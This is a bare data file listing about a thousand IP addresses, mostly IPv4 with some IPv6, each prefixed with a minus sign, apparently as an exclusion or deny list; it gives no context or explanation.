-103.240.212.63 -125.212.192.93 -103.240.214.67 -107.163.113.156 -107.163.113.210 -88.212.204.143 -142.91.241.66 -172.246.220.123 -52.202.69.158 -188.166.245.171 -161.202.148.252 -121.40.133.129 -116.90.162.27 -2a02:2100:8000:8000::380c:7c81 -114.242.195.194 -185.60.135.78 -60.13.251.8 -79.98.42.236 -185.67.2.183 -23.225.89.170 -211.23.34.35 -153.126.189.44 -67.222.14.21 -162.247.235.73 -85.254.126.108 -178.21.113.234 -157.7.209.168 -74.206.240.126 -84.2.34.141 -160.16.86.199 -198.199.124.186 -221.226.176.104 -192.161.182.118 -45.55.250.214 -182.16.48.189 -50.115.132.117 -198.210.33.59 -185.50.196.18 -133.130.112.59 -122.9.163.236 -81.169.133.219 -112.126.88.29 -13.250.14.39 -82.144.222.91 -178.33.187.99 -149.202.90.197 -103.37.161.113 -203.175.168.10 -188.164.192.63 -213.125.125.155 -173.192.141.89 -124.205.7.73 -74.206.240.82 -174.137.175.90 -5.39.81.20 -116.62.32.43 -43.241.235.102 -207.58.177.65 -78.128.78.195 -121.40.140.232 -172.246.220.199 -23.225.113.113 -103.20.213.39 -104.223.76.235 -151.248.112.89 -67.229.72.95 -104.202.185.95 -115.125.176.71 -198.50.143.51 -212.83.177.147 -82.113.145.191 -5.145.174.103 -67.215.8.229 -188.165.128.179 -88.255.77.166 -101.200.197.86 -153.142.118.199 -219.94.254.116 -87.98.254.254 -51.255.97.120 -23.225.89.164 -119.42.149.134 -64.118.87.198 -101.200.197.34 -76.12.219.77 -43.230.203.151 -139.196.195.90 -103.205.3.72 -87.229.45.16 -163.44.175.195 -159.203.138.61 -38.123.105.114 -82.77.9.104 -5.135.58.89 -128.1.182.146 -58.19.115.44 -5.153.225.215 -113.96.195.199 -5.188.204.101 -66.23.230.182 -192.102.7.198 -162.247.232.82 -49.50.76.193 -134.119.171.75 -45.112.126.108 -61.160.223.63 -198.143.175.251 -205.147.103.71 -185.63.154.78 -5.45.77.181 -218.244.139.221 -216.14.125.237 -103.239.242.34 -46.17.44.17 -74.207.248.174 -160.16.93.55 -194.103.221.98 -157.7.201.234 -172.246.196.18 -103.4.217.51 -118.82.9.204 -43.230.202.165 -104.238.66.23 -85.222.230.216 -23.92.210.67 -172.255.173.167 -5.255.92.43 -172.255.159.210 -153.127.251.180 -174.137.169.253 -83.149.67.206 -185.12.111.135 -107.179.93.50 -172.107.146.176 -188.40.186.66 -47.94.255.23 -209.164.84.146 -121.40.66.4 -52.59.218.129 -91.229.113.71 -107.170.128.48 -103.240.213.70 -74.208.144.46 -216.119.150.61 -185.20.12.70 -116.62.149.163 -174.137.63.114 -188.166.104.67 -207.177.69.213 -83.220.39.13 -23.230.19.235 -211.161.200.78 -121.42.27.104 -2a0a:7d80:1:9::98:1f1 -139.224.28.54 -183.30.195.186 -77.92.144.27 -120.25.197.138 -58.215.142.25 -202.179.64.20 -185.12.111.138 -51.255.35.187 -43.230.201.166 -204.93.61.199 -122.228.80.176 -172.246.196.11 -84.54.236.53 -176.126.41.168 -210.116.77.36 -23.225.0.47 -139.196.25.47 -104.207.154.229 -198.199.83.183 -121.43.231.109 -121.42.41.36 -158.69.99.22 -198.176.55.26 -68.169.66.150 -23.19.237.49 -113.128.24.2 -198.24.128.30 -167.114.51.92 -37.221.193.221 -176.123.8.192 -198.44.165.13 -23.224.115.227 -107.180.85.191 -98.126.202.132 -133.242.203.130 -173.209.43.94 -65.60.9.132 -128.199.151.136 -118.190.20.157 -216.70.113.35 -45.61.114.22 -79.98.24.57 -156.237.178.132 -103.240.213.33 -139.5.211.27 -114.55.43.197 -91.142.223.79 -95.211.241.161 -199.223.209.190 -194.50.76.253 -91.223.223.64 -80.73.133.251 -104.207.40.131 -172.85.98.244 -222.233.54.153 -50.23.141.196 -201.47.186.77 -156.237.176.216 -103.4.216.97 -69.16.215.194 -151.80.166.124 -133.130.112.101 -50.63.161.245 -91.215.152.72 -71.19.249.115 -120.24.242.116 -83.150.67.19 -159.148.13.148 -81.0.226.97 -139.162.45.24 -112.124.35.3 -139.196.24.31 -111.202.15.48 -185.182.96.31 -205.147.97.105 -43.230.201.162 -5.178.109.11 -23.235.206.132 -220.181.86.17 -172.247.51.189 -51.15.81.1 -88.99.251.236 -5.199.166.185 -166.63.21.76 -124.243.223.33 -115.125.176.15 -103.74.121.184 -43.241.56.99 -45.77.166.165 -104.131.164.117 -173.252.200.242 -192.250.225.105 -5.45.74.165 -114.112.91.120 -150.95.157.26 -49.212.81.80 -64.60.198.11 -59.75.151.4 -95.183.3.46 -122.224.223.182 -103.255.179.149 -172.255.173.164 -120.55.113.214 -2a0a:7d80:1:9::99:2a8 -173.239.17.247 -107.163.113.144 -185.66.140.176 -61.132.221.188 -76.164.228.50 -67.228.79.238 -23.250.28.24 -95.211.162.67 -149.202.250.36 -122.213.199.156 -193.19.242.161 -213.188.29.151 -49.212.230.135 -103.90.241.251 -209.190.65.4 -156.67.217.113 -120.25.121.72 -211.162.125.181 -208.94.238.44 -133.242.55.99 -2600:3c03::f03c:91ff:fef1:e1fa -156.235.169.3 -104.168.87.107 -121.201.50.174 -54.228.95.188 -207.58.132.80 -199.167.201.129 -117.34.109.130 -84.21.7.140 -5.178.109.238 -185.74.254.107 -50.22.189.135 -156.235.170.28 -93.125.48.27 -172.107.71.4 -68.169.59.111 -153.126.138.181 -63.142.248.159 -219.143.196.134 -149.202.195.23 -59.188.231.29 -116.30.196.24 -103.230.121.209 -162.243.185.62 -104.149.66.186 -183.133.71.255 -120.77.33.14 -46.231.204.98 -209.164.81.155 -208.92.89.50 -172.106.186.31 -121.43.149.172 -207.58.132.79 -209.141.58.12 -212.129.20.52 -192.186.143.248 -159.203.149.199 -196.11.82.12 -2a0a:7d80:1:9::98:255 -103.100.157.187 -172.247.38.23 -172.246.196.69 -173.255.212.29 -146.185.177.155 -96.47.235.188 -185.31.159.44 -104.244.75.44 -203.151.209.99 -103.15.179.110 -23.238.129.114 -107.170.114.236 -87.98.162.173 -45.55.58.243 -198.204.225.82 -115.28.80.45 -82.223.7.214 -187.17.176.110 -212.83.150.71 -106.186.31.40 -124.243.221.103 -67.225.249.244 -119.38.132.220 -91.229.23.87 -64.22.68.108 -2a01:488:66:1000:5c33:8384:0:1 -153.121.40.197 -23.224.115.210 -216.106.96.76 -23.225.95.107 -104.250.125.43 -89.163.243.63 -213.32.75.253 -77.235.50.52 -45.32.108.7 -118.250.183.23 -185.89.206.23 -120.79.37.202 -109.201.149.216 -68.71.129.37 -209.200.43.187 -172.252.10.227 -153.122.12.105 -43.230.200.73 -43.230.200.244 -191.101.233.104 -42.117.2.195 -115.231.65.182 -119.23.252.20 -5.45.76.96 -82.96.149.157 -172.245.127.80 -188.226.151.134 -185.93.245.187 -175.41.243.57 -112.74.24.13 -180.97.195.56 -95.211.231.163 -116.62.53.7 -156.235.172.89 -54.37.242.200 -2a0a:7d80:1:7::96:85 -85.31.101.36 -103.41.124.221 -54.155.64.232 -45.125.48.217 -114.229.161.130 -58.117.134.152 -216.107.153.245 -155.94.69.206 -82.211.44.169 -187.45.80.46 -185.8.33.122 -172.246.196.177 -136.0.69.243 -87.230.19.155 -112.121.189.76 -108.163.161.140 -104.202.185.180 -76.12.219.174 -23.230.224.188 -110.164.195.35 -172.107.75.209 -65.60.43.176 -187.189.219.107 -112.25.142.246 -140.86.39.163 -115.28.141.8 -67.229.63.86 -199.119.141.133 -103.205.3.73 -118.31.39.72 -37.153.110.196 -174.137.164.164 -103.240.212.48 -104.149.66.140 -119.29.55.112 -144.48.243.230 -160.16.225.219 -216.224.117.204 -185.85.191.140 -172.255.173.122 -129.146.113.108 -198.46.146.163 -103.206.21.136 -139.162.122.93 -152.160.33.15 -23.225.239.245 -121.40.176.73 -149.12.208.146 -193.232.45.119 -103.240.213.54 -103.43.44.183 -163.172.83.142 -180.153.90.216 -198.211.119.42 -185.66.175.31 -185.17.181.172 -95.80.109.52 -218.94.119.66 -114.55.24.110 -120.25.126.2 -221.2.79.174 -154.56.1.12 -45.77.23.97 -212.68.46.64 -128.199.39.87 -45.77.174.96 -27.254.146.15 -151.236.217.17 -66.171.236.8 -59.175.148.23 -5.9.184.162 -45.76.252.248 -106.14.24.5 -124.219.71.245 -88.150.137.216 -114.215.196.78 -168.235.88.220 -185.211.244.129 -199.231.93.147 -43.230.200.36 -69.42.90.196 -174.137.164.161 -107.6.221.125 -14.192.8.48 -45.76.185.229 -198.199.118.147 -159.65.183.30 -23.225.239.32 -23.224.115.123 -69.61.64.187 -111.230.199.232 -103.82.140.68 -159.8.232.137 -133.242.226.227 -81.0.247.119 -112.124.111.119 -45.35.102.151 -121.40.108.39 -172.246.220.228 -216.224.117.107 -139.199.9.81 -120.55.169.127 -160.16.230.238 -103.240.215.162 -172.255.173.112 -54.151.127.210 -96.125.169.163 -95.213.134.134 -198.176.55.23 -138.68.228.190 -103.74.121.156 -195.208.185.36 -151.80.45.49 -216.17.107.167 -43.241.221.159 -94.142.155.73 -219.148.146.61 -13.68.115.141 -2600:3c02::f03c:91ff:fea8:7eee -173.212.194.176 -149.202.51.220 -78.157.216.83 -103.63.212.60 -114.55.24.48 -172.246.196.233 -62.210.124.5 -103.240.215.15 -119.147.161.90 -172.107.75.224 -120.26.40.189 -155.94.69.218 -52.205.183.123 -185.69.154.168 -5.196.200.246 -122.183.102.88 -31.154.69.242 -43.230.202.7 -103.240.215.8 -46.175.224.30 -5.45.78.100 -184.175.106.216 -115.238.244.85 -185.103.219.56 -23.19.237.45 -5.178.109.152 -157.52.240.93 -185.103.217.222 -162.243.254.6 -160.99.31.32 -133.242.23.238 -104.131.35.102 -111.207.11.210 -2a0a:7d80:1:7::103:32e -151.248.120.65 -123.207.123.23 -222.66.130.85 -51.255.92.89 -128.199.88.163 -111.202.15.22 -103.41.125.18 -43.230.202.127 -212.32.243.141 -178.170.217.77 -115.125.176.145 -218.22.187.245 -159.148.13.141 -45.117.81.214 -31.222.141.4 -107.163.113.56 -128.199.214.130 -2a0a:7d80:1:7::106:162 -103.15.200.224 -218.61.0.183 -185.157.232.181 -212.24.111.59 -176.103.63.16 -103.246.18.16 -87.117.239.120 -50.28.19.0 -2a0a:7d80:1:7::91:22c -5.135.58.101 -58.30.96.166 -149.210.143.175 -120.24.183.153 -103.100.157.168 -41.77.80.234 -134.119.47.90 -176.223.221.94 -153.126.130.221 -103.253.68.4 -97.74.235.131 -108.171.182.16 -107.164.66.231 -221.181.168.28 -216.224.117.79 -43.230.201.242 -5.178.109.13 -139.224.194.218 -91.227.16.115 -87.106.71.45 -194.19.246.124 -107.165.201.194 -115.125.176.123 -61.12.7.243 -216.224.117.67 -142.4.107.77 -162.243.175.155 -103.74.121.201 -104.171.24.25 -35.163.247.12 -5.149.253.51 -108.60.197.238 -182.16.69.164 -103.35.74.142 -96.44.131.149 -174.137.161.123 -67.229.124.46 -178.18.201.2 -202.47.95.147 -108.59.251.58 -120.26.237.73 -172.106.184.21 -198.211.127.27 -133.242.195.119 -94.23.109.18 -172.106.186.47 -39.108.103.64 -109.237.25.80 -123.56.184.81 -172.255.173.78 -2.50.7.30 -85.17.66.162 -142.91.243.75 -219.135.175.70 -115.28.41.167 -176.31.162.184 -94.124.85.18 -188.132.147.184 -101.201.211.24 -46.231.204.68 -199.91.72.24 -51.255.25.232 -67.203.4.66 -104.202.185.97 -153.121.40.55 -107.180.79.157 -160.16.64.49 -103.1.209.29 -23.238.129.82 -66.171.236.211 -209.152.181.57 -103.205.3.110 -106.42.61.187 -2a0a:7d80:1:7::105:378 -103.197.70.48 -67.222.143.252 -89.185.228.33 -118.178.181.173 -52.11.22.242 -49.212.63.195 -35.201.130.214 -122.144.11.21 -107.163.113.115 -23.111.148.105 -61.140.238.187 -131.112.4.43 -23.225.113.246 -23.225.113.246 -81.16.150.250 -121.40.179.200 -122.9.22.141 -45.35.125.62 -107.163.113.83 -195.62.53.76 -150.95.148.90 -209.182.215.10 -68.64.172.83 -185.242.161.65 -156.235.171.144 -182.163.102.227 -45.56.70.52 -118.126.8.171 -70.32.82.80 -172.247.51.95 -37.230.103.142 -194.135.91.127 -188.166.117.147 -216.106.96.77 -99.192.209.85 -23.225.95.104 -217.12.201.189 -120.78.177.154 -222.132.90.130 -50.22.198.217 -93.115.31.69 -60.191.115.202 -81.180.72.22 -155.254.16.25 -23.88.82.212 -172.246.220.72 -47.90.23.57 -5.135.225.50 -173.252.204.216 -106.14.136.23 -194.28.50.22 -119.42.146.228 -103.28.36.43 -222.187.227.156 -93.57.88.211 -41.76.169.15 -39.106.145.5 -66.171.239.176 -37.58.17.140 -176.58.100.193 -166.63.21.55 -46.245.167.10 -105.235.117.242 -67.229.32.196 -134.119.173.156 -159.203.69.183 -104.168.87.9 -31.28.163.208 -123.207.246.35 -113.10.247.138 -43.230.200.8 -128.199.224.96 -184.154.163.85 -198.211.101.209 -107.189.161.78 -185.4.227.118 -202.6.17.143 -173.236.78.72 -188.65.211.27 -101.201.237.201 -115.28.79.187 -113.33.236.83 -103.12.50.56 -178.208.91.9 -219.136.229.67 -118.193.219.47 -203.146.253.31 -115.125.176.90 -153.126.215.134 -178.218.220.220 -23.224.115.186 -208.167.252.3 -80.233.244.86 -175.25.48.219 -93.180.156.135 -45.33.93.203 -172.246.220.125 -174.137.161.75 -188.166.182.66 -107.172.9.147 -124.232.152.241 -103.48.194.75 -182.92.97.153 -107.187.41.166 -37.200.102.45 -216.14.114.163 -23.244.42.54 -45.61.112.40 -222.73.37.61 -45.32.230.206 -38.64.38.105 -77.75.37.67 -209.200.19.77 -84.234.66.128 -172.246.196.49 -212.68.42.105 -91.134.110.176 -74.117.221.75 -178.33.156.138 -156.67.216.217 -137.74.154.68 -41.59.82.158 -192.241.152.140 -195.8.233.161 -104.202.185.200 -139.196.44.63 -43.225.108.65 -164.132.98.248 -153.126.175.37 -142.4.103.67 -118.89.178.15 -146.185.182.45 -190.57.169.140 -116.90.177.227 -58.220.241.42 -103.240.215.49 -209.142.66.201 -160.16.212.175 -104.236.64.85 -45.118.135.155 -89.188.127.226 -121.41.108.28 -192.3.52.13 -84.0.172.59 -62.215.180.197 -185.61.150.78 -107.186.35.95 -42.229.96.161 -104.161.79.103 -137.74.154.97 -46.137.114.150 -120.55.94.137 -118.184.181.144 -118.184.181.142 -173.255.201.253 -198.50.194.82 -211.159.188.91 -182.23.113.82 -212.48.92.58 -107.163.113.187 -191.101.11.174 -196.49.0.6 -107.178.150.103 -50.23.130.156 -123.57.136.131 -146.185.142.192 -23.225.95.215 -91.214.249.4 -38.64.38.104 -69.30.55.171 -86.39.66.52 -67.196.55.166 -173.192.5.137 -115.28.89.179 -109.120.129.237 -174.37.182.169 -110.50.96.94 -172.255.173.217 -176.31.117.112 -198.52.110.86 -217.61.130.85 -94.23.176.85 -128.199.132.14 -64.64.3.36 -103.56.210.41 -178.21.14.133 -74.82.163.4 -103.227.129.72 -121.40.42.155 -149.202.113.254 -121.40.79.84 -94.23.2.157 -85.206.175.203 -210.51.174.42 -47.88.84.249 -64.22.68.88 -45.33.21.53 -13.115.69.229 -149.56.24.215 -104.202.185.167 -172.246.196.109 -194.135.83.18 -69.87.192.52 -153.125.234.57 -212.73.139.173 -204.93.61.56 -84.238.141.194 -131.108.125.60 -173.255.231.20 -139.162.96.103 -185.50.196.72 -142.44.234.38 -43.230.203.184 -177.154.55.67 -153.127.192.196 -192.186.173.249 -35.162.145.0 -195.62.12.147 -120.76.193.103 -182.48.61.77 -43.229.84.239 -88.99.42.232 -43.230.200.224 -163.47.8.207 -103.253.72.48 -91.198.83.214 -217.23.13.145 -69.4.87.59 -194.19.246.31 -172.106.187.240 -50.30.46.253 -5.39.219.96 -217.65.4.86 -5.134.1.64 -122.14.213.45 -209.126.96.144 -51.254.165.59 -162.243.196.119 -176.223.197.60 -178.22.67.197 -23.229.4.30 -91.191.145.144 -120.24.45.9 -178.33.156.137 -123.59.37.214 -62.152.39.254 -210.211.107.201 -45.32.28.61 -183.61.84.35 -14.0.74.140 -217.18.43.18 -142.4.113.205 -209.200.10.126 -50.23.130.164 -42.51.220.6 -185.91.108.73 -114.55.10.143 -64.78.163.227 -121.43.193.105 -156.237.179.108 -120.76.52.6 -173.252.197.104 -119.29.82.104 -103.204.76.114 -115.125.176.166 -150.95.150.190 -2a0a:7d80:1:7::101:5a -142.91.95.138 -211.149.181.91 -46.17.44.18 -188.165.41.27 -79.137.28.26 -184.95.36.83 -185.209.139.30 -205.147.98.159 -64.22.68.253 -185.56.93.69 -177.69.235.221 -153.126.179.87 -199.101.134.202 -149.56.151.156 -204.74.217.40 -45.114.94.113 -43.230.200.169 -185.48.33.66 -153.121.32.74 -195.201.32.68 -23.247.10.184 -23.225.113.149 -104.207.44.95 -67.227.209.66 -37.97.141.178 -188.166.123.136 -186.24.35.69 -52.221.235.231 -61.194.8.28 -69.10.61.34 -5.178.109.170 -104.168.30.226 -23.19.202.21 -200.187.60.68 -103.248.137.143 -66.254.190.198 -103.53.171.200 -176.223.122.143 -103.240.213.185 -119.29.150.99 -71.18.91.61 -145.239.236.153 -66.34.178.113 -47.90.81.133 -116.255.159.4 -158.69.161.54 -120.25.86.173 -104.200.18.147 -110.52.11.148 -138.197.17.105 -77.50.73.115 -186.226.60.253 -142.91.239.123 -216.224.117.109 -49.50.77.78 -218.19.216.153 -185.181.228.117 -199.119.137.179 -174.142.186.239 -60.214.157.59 -150.95.146.253 -103.28.37.248 -120.26.124.251 -74.54.253.181 -188.226.152.221 -120.25.66.186 -31.186.101.4 -137.74.189.171 -107.181.148.121 -43.230.200.6 -213.32.32.202 -121.127.241.192 -178.33.117.213 -79.98.104.166 -2600:3c00::f03c:91ff:fe18:c00b -139.59.117.204 -118.190.201.134 -122.9.229.180 -108.61.132.233 -162.243.4.26 -172.102.197.181 -31.132.1.36 -103.193.172.192 -104.221.169.14 -174.138.6.132 -216.224.117.144 -133.130.66.206 -23.225.95.214 -101.132.143.55 -43.230.200.122 -211.125.65.122 -23.225.113.222 -94.228.216.196 -195.110.58.155 -107.164.194.245 -185.4.227.125 -114.55.130.120 -104.202.185.80 -37.230.97.153 -23.88.142.138 -103.76.248.197 -78.130.180.222 -103.100.157.131 -95.211.231.164 -188.225.77.150 -31.3.0.78 -112.25.15.6 -108.59.8.13 -23.225.239.16 -103.44.160.230 -67.228.3.238 -160.16.116.126 -104.207.44.119 -103.37.85.57 -104.198.65.195 -175.102.12.158 -121.41.4.52 -185.36.64.182 -31.7.35.52 -115.68.89.37 -104.245.102.11 -120.26.140.105 -174.138.50.162 -47.90.17.95 -82.135.151.254 -107.182.238.154 -195.252.127.25 -111.42.3.9 -64.22.68.80 -23.225.239.59 -107.179.93.39 -150.95.180.250 -74.86.147.249 -23.225.95.198 -37.187.199.34 -192.210.192.122 -37.97.136.111 -210.245.95.12 -192.3.52.14 -178.32.190.34 -108.60.222.171 -217.61.130.134 -192.99.180.153 -103.100.157.242 -221.221.224.41 -172.246.220.249 -120.78.56.251 -209.236.119.83 -120.76.188.144 -122.13.213.45 -202.79.19.173 -185.50.196.82 -103.27.210.58 -74.127.45.155 -172.107.71.10 -46.17.101.197 -103.250.21.3 -103.246.219.78 -183.60.192.163 -91.218.214.80 -185.106.23.11 -115.125.176.210 -103.198.68.52 -192.241.165.55 -192.99.114.187 -45.252.249.243 -192.99.78.141 -39.106.123.12 -178.236.136.91 -139.162.103.154 -188.226.130.67 -217.150.94.58 -188.132.148.112 -212.129.48.210 -217.30.184.104 -103.71.177.103 -107.165.201.244 -180.222.190.44 -38.64.38.106 -60.210.98.64 -54.191.115.244 -207.154.211.224 -66.254.177.74 -84.19.168.198 -178.18.196.174 -120.31.142.89 -172.255.173.88 -156.237.176.207 -119.23.140.138 -50.59.162.202 -104.207.50.110 -107.178.149.95 -2a0a:7d80:1:9::98:129 -213.133.103.169 -104.202.185.36 -217.182.113.5 -23.229.115.23 -47.94.104.182 -123.57.13.155 -185.86.210.245 -142.4.103.93 -211.95.79.214 -103.55.2.248 -192.117.146.161 -2600:3c03::f03c:91ff:fedb:4e7 -58.219.53.171 -182.254.145.95 -31.186.96.68 -93.115.31.51 -107.186.35.28 -103.30.114.163 -216.224.117.187 -107.178.149.118 -69.65.50.65 -23.225.95.10 -47.92.115.202 -104.161.79.102 -120.77.33.153 -47.95.198.22 -45.114.118.58 -49.212.58.204 -153.126.195.82 -133.242.181.53 -64.140.160.214 -89.188.113.112 -43.230.202.242 -27.254.146.103 -153.120.83.12 -43.230.201.23 -37.97.165.41 -209.188.114.166 -188.165.248.39 -192.241.128.78 -128.1.182.143 -209.152.173.112 -103.74.121.158 -5.178.109.246 -120.92.230.205 -23.19.22.27 -103.240.215.92 -136.0.69.144 -145.239.200.8 -43.230.201.46 -66.37.25.185 -184.164.143.108 -47.90.105.156 -104.203.82.91 -123.56.80.101 -37.128.127.51 -103.37.1.108 -188.165.95.3 -192.184.84.193 -5.45.67.76 -104.232.102.146 -51.254.153.99 -144.217.94.241 -146.148.22.179 -104.224.192.21 -119.38.132.215 -153.127.217.145 -173.252.192.45 -138.201.75.137 -103.231.70.234 -74.91.30.162 -69.90.8.153 -104.202.185.130 -62.100.206.234 -94.247.28.248 -160.16.202.115 -103.12.49.58 -139.162.220.100 -174.137.161.83 -213.131.229.29 -153.126.211.200 -218.75.201.78 -159.203.170.124 -54.39.67.50 -109.169.59.127 -106.187.98.90 -172.107.146.133 -156.237.178.157 -43.230.202.250 -134.119.31.27 -185.129.249.122 -51.15.58.119 -82.144.222.149 -61.144.96.210 -107.6.212.187 -159.253.33.205 -62.233.63.35 -86.104.177.84 -103.98.112.252 -119.28.21.64 -173.0.63.197 -104.196.100.247 -68.232.185.77 -103.231.56.115 -107.163.113.62 -204.74.219.135 -125.39.139.74 -23.225.239.195 -5.135.225.49 -115.29.44.218 -52.66.71.40 -142.4.107.252 -172.107.146.165 -61.178.108.170 -195.154.43.74 -62.213.100.239 -45.42.94.185 -93.119.184.155 -85.143.192.17 -194.29.175.241 -188.226.218.34 -92.222.220.78 -208.167.237.234 -174.78.57.120 -183.90.171.12 -124.207.22.74 -5.56.60.163 -185.13.56.215 -43.230.201.94 -188.212.37.63 -178.32.92.69 -37.220.0.99 -103.240.213.57 -209.200.13.172 -172.247.51.173 -202.53.80.50 -52.24.151.202 -103.221.220.178 -5.135.58.80 -139.162.27.56 -175.124.123.93 -23.104.135.184 -103.240.214.127 -107.163.113.221 -23.19.202.34 -173.239.50.125 -45.65.192.4 -198.74.52.19 -176.223.222.14 -195.137.160.112 -213.145.47.167 -5.2.64.20 -193.182.240.161 -193.182.240.161 -129.241.210.178 -192.163.238.57 -185.129.248.119 -47.90.6.33 -120.27.120.200 -85.204.50.2 -172.107.75.196 -210.1.60.214 -107.164.66.23 -133.130.101.34 -5.145.174.116 -23.110.61.105 -54.208.78.155 -185.13.56.158 -95.154.128.54 -198.24.161.108 -216.224.117.59 -172.255.159.250 -64.91.240.21 -62.63.190.31 -116.62.137.91 -169.48.200.183 -173.255.138.100 -58.17.82.23 -139.129.211.49 -45.64.98.109 -195.93.239.49 -111.225.144.188 -47.97.34.57 -31.220.60.80 -104.236.206.193 -46.105.244.246 -31.7.230.45 -66.212.31.75 -69.195.139.234 -144.217.6.129 -175.103.58.165 -43.230.201.14 -139.159.32.230 -173.252.192.46 -101.201.149.208 -162.243.200.111 -133.242.164.148 -150.95.174.158 -47.90.40.24 -199.119.143.155 -100.43.129.75 -80.77.113.54 -137.74.85.115 -2a0a:7d80:1:7::96:2d5 -185.164.138.201 -185.95.2.98 -104.245.102.7 -187.63.160.2 -209.200.43.180 -118.184.1.26 -5.135.155.187 -2600:3c01::f03c:91ff:fe73:a9d9 -61.64.57.146 -188.93.23.94 -103.199.16.165 -91.195.200.84 -103.12.51.8 -120.27.42.190 -163.25.104.52 -119.28.102.241 -209.41.75.207 -178.62.144.47 -109.254.248.76 -43.230.201.224 -200.73.116.155 -50.23.141.205 -208.92.89.51 -192.241.193.48 -185.233.130.248 -172.107.146.185 -23.225.95.25 -172.252.10.97 -103.240.212.128 -211.148.28.56 -91.134.197.220 -91.237.108.37 -93.189.36.214 -38.64.38.98 -31.169.92.99 -128.199.226.83 -60.250.14.38 -198.20.168.20 -217.13.93.64 -82.146.44.166 -107.178.149.96 -37.211.46.83 -178.32.215.141 -110.45.175.218 -91.216.9.107 -198.57.203.104 -45.76.190.141 -45.35.102.137 -23.225.95.207 -45.32.130.123 -35.158.24.85 -185.129.249.57 -212.68.57.201 -109.163.208.133 -158.69.119.94 -218.92.44.27 -163.44.169.92 -51.255.95.109 -149.154.70.16 -45.61.115.4 -120.24.255.209 -114.215.18.162 -218.232.75.234 -45.114.84.40 -202.6.17.172 -104.245.102.25 -163.44.192.224 -172.255.173.72 -87.229.98.237 -188.166.189.191 -31.220.57.83 -43.229.38.18 -120.31.129.72 -193.150.100.10 -36.55.230.187 -202.153.179.197 -172.246.220.11 -178.251.24.101 -117.141.17.62 -23.110.61.92 -23.225.89.71 -211.110.139.175 -50.22.189.137 -185.129.249.118 -104.130.206.53 -45.114.124.60 -176.31.129.177 -213.32.70.128 -106.15.57.91 -150.95.179.216 -103.12.49.38 -209.141.50.49 -23.88.82.130 -39.108.129.137 -211.151.129.116 -113.107.188.179 -185.170.113.192 -5.189.179.138 -23.92.54.211 -50.23.130.144 -172.93.50.76 -68.169.54.77 -60.191.223.42 -45.33.106.242 -209.142.64.253 -103.205.2.84 -133.18.1.17 -103.3.250.233 -5.45.77.108 -134.119.73.33 -114.215.170.33 -85.118.98.251 -141.138.195.199 -51.254.153.101 -89.108.120.212 -103.250.94.232 -209.141.57.216 -103.240.212.111 -173.255.224.59 -124.94.137.238 -192.241.129.26 -139.59.246.62 -203.124.107.23 -120.76.205.206 -114.217.201.251 -169.53.183.102 -64.237.59.204 -23.88.82.13 -64.237.59.200 -69.61.20.251 -119.23.125.113 -144.217.62.71 -67.229.72.94 -114.113.148.149 -119.29.22.79 -216.224.117.101 -66.102.192.10 -172.247.51.18 -184.173.65.66 -31.179.254.207 -107.180.79.237 -45.56.84.127 -54.74.153.15 -174.137.164.172 -198.16.74.38 -43.230.203.38 -172.246.220.212 -182.16.32.170 -88.99.195.12 -88.99.195.12 -104.238.182.199 -78.39.213.166 -2a0a:7d80:1:9::99:148 -163.172.124.96 -103.240.220.75 -137.74.35.40 -200.155.159.198 -159.148.13.137 -120.24.184.163 -118.250.108.97 -153.126.178.31 -103.100.157.108 -62.63.190.37 -132.148.0.1 -144.168.124.14 -23.225.113.49 -62.63.191.21 -121.201.48.160 -50.23.130.161 -5.101.0.215 -192.99.180.154 -50.57.78.151 -103.193.242.43 -149.202.22.244 -120.27.138.60 -169.50.170.199 -128.1.182.101 -5.135.108.242 -95.213.174.251 -207.192.73.98 -110.164.67.244 -217.61.128.218 -176.56.62.245 -123.57.47.111 -131.161.136.133 -217.13.93.129 -85.215.5.52 -51.254.34.140 -2a0a:7d80:1:7::96:23c -67.202.114.240 -23.104.135.68 -23.224.115.93 -185.191.228.140 -89.107.230.202 -45.76.157.243 -62.63.190.43 -43.230.203.109 -91.224.140.20 -45.59.69.181 -185.4.48.114 -70.32.100.188 -51.15.134.51 -121.201.96.37 -109.203.107.35 -107.187.41.96 -45.61.115.61 -115.125.176.11 -103.27.126.50 -117.48.218.104 -121.199.12.189 -134.119.62.135 -185.153.198.231 -173.252.229.89 -211.149.224.182 -172.246.196.117 -68.68.105.195 -103.74.121.155 -207.244.103.74 -84.19.186.101 -94.177.122.57 -213.136.85.173 -66.70.193.13 -192.99.233.182 -160.16.88.213 -81.17.138.115 -106.186.114.119 -45.124.95.184 -78.129.251.98 -195.154.49.54 -46.105.182.115 -158.69.129.185 -172.104.187.91 -139.196.154.111 -80.237.242.199 -62.138.0.37 -162.223.94.199 -114.55.52.135 -104.168.142.140 -103.18.245.207 -107.170.91.103 -45.41.92.186 -192.34.26.35 -178.57.217.154 -123.59.204.252 -23.225.95.189 -45.32.100.168 -203.177.109.3 -173.243.113.170 -142.91.243.97 -103.240.212.142 -180.222.182.112 -203.223.144.100 -47.90.79.224 -61.164.137.139 -136.0.69.34 -222.85.144.34 -153.126.166.146 -119.23.37.78 -101.200.179.116 -103.240.214.101 -108.61.162.107 -91.224.194.57 -107.189.161.85 -119.28.64.58 -45.77.46.121 -107.187.41.7 -45.76.172.237 -172.255.159.221 -159.89.188.164 -107.179.102.195 -216.17.102.105 -121.40.111.2 -122.114.122.49 -23.238.176.219 -112.124.9.202 -179.228.244.154 -103.35.151.62 -23.88.82.29 -106.14.176.10 -162.144.139.72 -54.83.11.210 -191.252.80.192 -104.236.137.127 -173.225.112.142 -222.255.168.100 -216.92.17.9 -184.95.53.29 -62.138.142.7 -167.88.148.188 -49.212.27.37 -45.63.20.41 -211.149.228.41 -91.224.194.13 -88.99.161.108 -195.154.188.208 -47.90.75.104 -103.74.118.95 -122.10.3.220 -172.247.51.124 -69.164.197.239 -52.18.83.151 -209.126.107.72 -120.236.240.13 -188.165.6.60 -104.149.66.181 -107.175.219.137 -23.89.142.254 -107.21.49.211 -198.210.35.107 -142.91.232.126 -103.27.207.105 -156.235.168.37 -216.17.110.19 -82.202.193.132 -122.114.129.61 -45.32.48.143 -178.62.144.185 -43.230.201.10 -91.227.16.41 -199.229.255.151 -212.76.95.83 -103.205.0.120 -121.41.16.29 -222.255.122.172 -198.24.163.250 -104.207.40.150 -128.46.115.22 -172.255.173.14 -104.202.185.236 -23.88.238.138 -59.86.162.153 -103.240.214.37 -166.63.21.37 -150.95.152.171 -82.145.53.209 -46.105.73.157 -123.56.232.117 -89.202.46.186 -222.255.237.150 -166.63.21.71 -5.178.109.122 -104.203.82.177 -43.230.201.233 -192.254.130.159 